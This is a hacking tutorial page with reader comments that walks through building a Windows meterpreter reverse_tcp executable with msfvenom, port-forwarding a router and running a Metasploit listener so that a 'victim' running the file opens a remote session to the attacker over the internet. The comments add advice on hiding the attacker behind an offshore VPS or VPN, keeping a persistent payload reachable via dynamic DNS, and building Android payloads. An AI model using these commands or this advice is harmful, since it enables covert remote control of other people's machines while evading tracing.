How To: Perform an Attack Over WAN (Internet)

Perform an Attack Over WAN (Internet)

So, you want to perform an exploit on a victim, but you're not on the same network as their machine. In this tutorial, I'll be showing you how to set up a meterpreter reverse_tcp attack to work over the internet.

Understanding the Process

Here is the connection we wish to establish:

It's a reverse connection from the victim machine to the attacker machine through the internet. Note that the connection must pass through the attacker's router; this will be important later.

If we gave the victim a reverse_tcp virus with our local IP address as the LHOST (in this picture, it's, like we would in a normal LAN attack (when you're in the same network as the victim), this is what the connection would look like:

As you can see, the victim machine looks for in its own network. In this case, is a printer which, of course, isn't listening for the meterpreter connection.

Instead, we should provide our public IP address (in this case, it's, which will send the session to our router. From there, it's our router's job to direct it to our machine. This is where port forwarding comes in.

If we use, say, port 4444 as the LPORT in our reverese_tcp payload, and then tell our router to direct anything trying to connect to port 4444 from outside the network to our kali machine, then we can receive the connection. Without port forwarding, the connection doesn't know which machine on the attacker's network to direct the connection to, and the attack won't work.

Numbers You'll Need:

  1. Your Local IP Address
  2. Your Public IP Address
  3. Your Router's Local IP Address
  4. A Port of Your Choosing (but keep it consistent!)

To find your local IP address, open a terminal in your kali machine and type:

Under the interface you use to connect to the network (in this case I use ethernet, so it's eth0), look for the number next to "inet". This is your local IP address. For me, it's "", but for the sake of this tutorial I'm going to keep pretending it's "".

To find your public IP address, open your web browser and navigate to Next to "Your IP:" is your public IP address. For this tutorial, I'll be pretending mine is "". We'll use this website again later to verify if we've port forwarded correctly.

To find your router's local IP address, open a terminal in kali and type:
route -n

Look for the number under Gateway which contains the flags "UG". In my case, it's "". For you it may be or some other variant.

Lastly, I'm going to be using port 4444 for this tutorial, as it is somewhat of a convention. You can use a different port if you'd like, but make sure to keep it the same for everything I do in this tutorial.

Step 1: Creating the Payload

To create the payload, open a terminal in kali and type:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp -e generic/none -f exe LHOST= LPORT=4444 > /root/Desktop/evil_public.exe

This will create the virus "evil_public.exe" on your desktop.

Remember to replace "" with your public IP address, and "4444" with whatever port you're using, if it's not 4444.

Step 2: Port Forwarding

The process of port forwarding is slightly different on every router, so I can't give you specific instructions for your router. However, you should be able to follow my general instructions. If you're having trouble finding the settings that I'm changing on your own router's preferences, I recommend you look online for instructions regarding the specific router model you own.

First, you'll need to log into your router. To do so, type your router's IP local IP address into your browser. A login page will be displayed, where you'll be prompted to input a username and password.

If you have changed your router login before, type in those credentials. If you haven't, type in the default username and password for your router. It's usually 'admin' and 'password', but if you're unsure, check your router's packaging or the internet.

Bonus: If you're using the default password for your router, it's a good idea to change it. Keeping it as-is is a huge security risk.

Next, you'll need to find the port forwarding section of your router's settings. For me that's under the "Advanced" tab.

After clicking "Add Service", you'll be prompted to enter a few parameters. For the "Server IP Address", use your attacking machine's local IP address. For the Start and End port, input the same port that you've been using for the duration of this tutorial.

Once you click save, you should be port-forwarded.

Step 3: Starting the Listener

Lastly, we'll need to set up a listener to wait for a meterpreter session. Fire up the metasploit framework by typing:


Once it loads, type:

use multi/handler

Now, you'll need to type a series of options. I'll list them out for you:

  • set PAYLOAD windows/meterpreter/reverse_tcp
  • set LHOST
  • set LPORT 4444

Again, remember to change LHOST to your local IP address, and change LPORT if you used something other than 4444.

Finally, type "exploit" and hit enter to start the listener. As soon as your victim runs the "evil_public.exe" virus, you'll get a session.

If you're not sure if you port-forwarded correctly, go back to and type in the port that you used beside the "Port to Check:" option. Once you click "Check Port", it should say "Success" in green letters. If you didn't port forward correctly, it will say "Error" in red letters.

Alright, that's it! I hope you found this post helpful and easy to follow. If you have any problems, criticisms, or compliments, don't forget to leave a comment. Thanks for reading!

Just updated your iPhone? You'll find new features for Podcasts, News, Books, and TV, as well as important security improvements and fresh wallpapers. Find out what's new and changed on your iPhone with the iOS 17.5 update.


Great article, well written and explained. Keep it up!

Thanks, hyper!

Hey would this work on the same attack but used mettasploit to create a android package and use the same port with a local or public ip and also good tutorial learned alot

Adeptly explained, one couldn't ask for more. Well done.


gj +kudos

Excellent tut, well written and thorough. +1

well written!!! excellent tut...

This is one of the best articles, Well explained...
So is it more than 80% that antiviruses on windows will detect and delete it or no ?
is there a way to hide your identity,
and how can you find the hacker if you got hacked this way ??

Thanks, Baha Baghdadi. To answer some of your questions: Yes, this virus will be detected by pretty much all antiviruses because I used the default meterpreter template and no encoder. If you want to create one that will bypass av, I actually wrote an article about how to do that. Also, to find the hacker that hacked you this way, you would monitor the outbound connections coming from your computer and try to find the public IP address that the virus is connecting to. Lastly, about hiding your identity: if you don't want to be traced from the method I just mentioned, you can route your meterpreter session through another computer outside of your network, such as an AWS (amazon web services) server.

Alright, I hope that answers your questions, and thanks for reading my post!

Nice :D thanks for that.. but how am I going to know the virus in the connections ?

I'll have to admit, this would be a bit over my head, but you might want to refer to this article. It talks about using wireshark to detect meterpreter reverse https backdoors, but I'm thinking that reverse tcp would be similar.

Hi, can u make a post on how to route the connection using a proxy server in between, because the Victim can easily see the attacker's IP using TCP VIEWER.

So even if the victim sees the IP of attacker on their PC, it would be of the proxy IP, instead of the Attacker's original IP.

What about hiding your identity using a vpn service like private internet access for ex? Would that not work in this situation? Thx.

awesome! Perfect article. Thank you :)

great tutorial :D

How do i find the victims local ip addres. (over wan of course)

It's not possible until after you've established the meterpreter session. For this attack you don't need to know it, but if want to anyways you can always drop into a shell and use the command 'ipconifig' once you have a session.

One last thing can u take a look on this real quick:

(It says my port forwarding is timed out)

screenshoot of my settings:

Timed out:

-Maybe I should change the "protocol", what do u think went wrong?

If you take a look at the comments under this post, you will find my explanation to your current issue.


But if it is one of these options which is causing the problem:
• Local firewall
• Antivirus firewall
• Router firewall
• Router forwarding rules

-How can i first of all find which of the above it is, and avoid it?
Also, what do u think it is?

Out of those options, I think local firewall is the most common. You can test them by disabling your windows firewall, disabling your antivirus, etc. Although, just to be sure, you started the listener before you checked to see if the port was open, correct?

I created new rule in Firewall so it cant be firewall now, no antivirus , not even firewall of router, tried DMZ also and now I end up with consideration as it might be my ISP.


My router Does'nt support Port Forwarding What can i do now ?

You might want to look for a portmapper. I don't know much about these, but I saw one that appeared in a couple forums called upnp portmapper. I've never used it, so I'm not sure if it will work for you or not, but it might be worth a try.

If you can find a setting that allows SSH or Telnet connections to your router, you can enable port forwarding manually by editing its filesystem and making minor adjustments.


how would you go about doing that?

Very well written article I look forward to more articles from you.

hey Code a very good article , but can i ask how to mask the ip so it cant be traced back?

Purchase an offshore VPS and set it to redirect traffic to your machine. Primarily focus on the country of origin, this is critical in concealing your identity.


Perfect! Well written!

Thanks for the good article ..but in my case im lost ! in my case im using expressvpn connection , and im confused witch IP address I should use to preform an attack over the WAN ?

Destination Gateway Genmask Flags Metric Ref Use Iface UG 0 0 0 tun0 UG 100 0 0 eth0 UGH 0 0 0 tun0 UH 0 0 0 tun0 UG 0 0 0 tun0 UGH 0 0 0 eth0 U 100 0 0 eth0

any Idea on witch IP address I should use as an "LHOST " for my payload and for my listener ? My target is over the WAN ...not LAN .


Hi, i am having a very weird problem i set up my payload with msfvenom here is my output:msfvenom -p android/meterpreter/reversetcp LHOST=Public Ip LPORT=4444 R > /root/Desktop/android.apki tried also reverse https and http.I went to my router settings to configure port forwarding :

screen shot of my router: i went to msfconsole--> use exploit/multi/handler
set payload android/meterpreter/reversetcp
set LHOST (lan ip of the mashine) i also tried with Public ip it change to
set LPORT 4444 i'v tired also other ports like 443, 80, 7777.

exploit . (nothing happend)than i checked my ports if thay are open in : the status of my port 4444 was stealth so that means not open.. !! i also checked another web page and i got this error: Error: I could not see your service on on port (4444)Reason: Connection timed out.I am very confused why is this happening ?!

I called my ISP-s and they said they are not blocking ports i tried that from 2 diffrent ISP-s from my apartmant and home.. because im using my home pc

and my apartmant laptop for wan pentesting.Btw LAN worked perfectly the problem is only in WAN.Please tell me if i did anything wrong, and if i didnt please tell me were the problem is!

Thank you to all.

i have the same problem have you figured it out already ??? if so please let me know

Hey bro u need a static IP for making tcp connection over wan network

Its all good, but the Public IP Address changes almost everyday, os if we send a payload to someone and even make it persistent, what are we supposed to do so that payload connects back to our machine, even though our IP address has changed :/

Is there any method of overcoming this problem???

If your public IP address is constantly changing, you can set up a DNS server that redirects connections to your address. Use the address of the DNS server in your payload; you'll have to update the DNS server every time your public IP address changes, but you won't have to change the payload. I'd recommend starting at

The Victim can easily see the attacker's IP on their PC using TCP VIEWER.
Hence can we use a Proxy IP as our LHOST in the Payload instead of our Public IP ?

If yes than how to do it.

Yeah, it doesn't look like there's anything wrong with the configuration of your router. If the listener is running on your attacker machine while you check, then it should say the port is open, but there must be some other reason it is not visible. If I were you, I would try it using different ports, or even try different services (e.g. Apache) to find out what works. Good luck.

I know this is going to sound like a really basic question but bare with me. Does your machine still have the IP in the port forwarding rule? Since it may have got a different IP from DHCP?

This depends on your router. For example, my router always assigns each returning device the same IP address it had previously when it reconnects. However, all routers are different and it may be possible that you need to adjust your router's settings so that you don't have to keep changing your port forwarding rules each time your attacker machine disconnects and reconnects.

P.S. Sorry for the late reply, I've been less active on this site since OTW left a little while back

well its a very clear crisp article.must say you a good teacher.wish i can get some help on port forwarding in vm using NAT with a usb external router of tp link.tried several methods and tutorials but couldn,t confirm if its done.IIf i may know how to confirm whether my ports are forwarded in vm??

Thanks for this article, I think we are a lot of people trying to learn more about penetration testing and I just wanna say it is highly valued and appreciated. Im using PIA vpn usally. Which would make port forwarding unnecessary in my case, correct? But how should the options then be set for fx. backdoor as well as listenener? What IPs go where in order to establish a connect via WAN. And in order to make this connection persistant wouldn't it demand a static ip address? Thanks in advance.



my isp block all my ports...if I do port forwarding in my router i'ts not working because of isp blocking......I have 3 laptop connect to my router...ex =,, can't connect to any of this laptop outside from my you know ssh tunneling or some thing like that to preform this attack

i can't open ports? all ports are closed

i have a problem that i am using Access Point
it's complicated .. so many nodes and can't get into the configuration or settings
any solutions ??
this is my fb :

Here is my problem:

I configured my router to forward the port. I have ufw installed and also configured it but still whenever I go to canyouseeme it says Connection Timed out (which annoys me alot!)


Disable ufw and try to run this command:

sudo python -m SimpleHTTPServer 4444

P.S. : Make sure port 4444 isn't used:

netstat -vantu | grep :4444

If it's not, you'll see no output. Otherwise you'll need to kill what's using it (e.g. I2P uses this port for proxying).

I'm totally confused. What's the 'it's' you're talking about when you say "if it's not"?

You say to connect to simplehttpserver using port 4444, then you say we shouldn't see output, and that if we did we need to kill what's using it. Isn't simplehttpserver using it???

....Or did you mean "if the port's not open" ?

Hey guys,

I'm trying to resolve a problem since 2 days without success. I can't get the "sending stage" over wan. Here what i am doing :

Setting the payload with my public ip as LHOST 4444 as LPORT.

Then in metasploit
LHOST local ip
LPORT 4444

and it stay on the "starting the payload handler", my port is well forwarded : success on canyouseeme when starting a listener same with the nc -lvp 4444 in terminal.

I'm like really stuck so i can't continue my learning progression, i searched everywhere and couldn't find solution so that's why i'm asking here.

Would be really nice if you guys can send me the solution or give me a lead about what i have to do :D

Edit : I'm able to do this in lan without problem. I tried the " ReverseListenerBindAddress local ip " still doesn't work, but i don't find anything about this command so ..

is the port 4444 already being used by a different service? Try using port 44443 or something. Also try different payloads is my my thought.

Hey that's a very good article, but i had a problem i don't have a router, i use mobile hotspot as my internet connection, how to do it?????

Please help??????

The hotspot has an ip, no?

But i am using wifi addepter for internet sevice in kali and can't find the gateway ip of it plz help .for port fowrading in kali while usind wifi addepter for internet,with my mobile hotspot.

your mobile has an internal ip address just like any other devise that connects to the internet. I would google how to port forward on a mobile phone. I'm thinking the hot spot has the same ip as your phone.

i did as u said . but im using my college LAN now how can i perform port forwarding ??
plzz reply...

I am getting this error :/ at the end ;_;
openssl::ssl::sslerror ssl_connect syscall returned=5 errno=0 state=sslv2/v3 read server hello a


My host pc runs through a vpn. In virtualbox, I run kali. My network is connected by ntp. Is this article possible with my setup ? Should I bridge the connection ? Maybe assign my wireless stick to the VM itself . . .Furthermore, my IP should be protected this way(vpn) correct ?

Level of experience: Noob.
Programming: moderate
Networking: sub-par
Thanks anyone for your help !

hello warm hackers hope you guys doin well alright today i gotta ask u a question does anybody know how to access the specific remote router for example let say this is 350.199.000.255 the public IP of a remote router and you want to get access of this so what would be the way to do this how'll u do that i come across through the whole internet but i didn't find the relevant answer looking forward for positive response and thankx in advance: )

Yes man thanks first,,,for accepting my account setup,,,and I appreciate this web it's superb man I'll say it's the best one I've come across,,,and also the article is great,what I wanna ask is I've come across most of wi-fi hotspots in my area ,,mostly some are just from people phones meaning hotspotss and a few public ones and have passwords remember so I wanted help coz unfortunately I don't possess a router too..

Great write up!

I would like to know if this is possible by using the targets router, instead of my own?
Specifically with EvilOSX.
I would like to be able to connect back to the target machine (MacBook) from any public WiFi, or internet connection.

Can the port forwarding settings be configured to the targets router, and reach MY public IP from any network? I'm not sure how to go about this, through port 443, or 80, 8080?

Thanks for all of the informative articles, I'm a daily visitor on your site!

Thanks for a great article. One question that I have is how does the exe file land on the victims PC? How is that accomplished? Thanks.

Hey when I'm using my routers local ip, it does not open a login page or anything . It says unable to connect internet:-( but I can surf internet:'(

Share Your Thoughts

  • Hot
  • Latest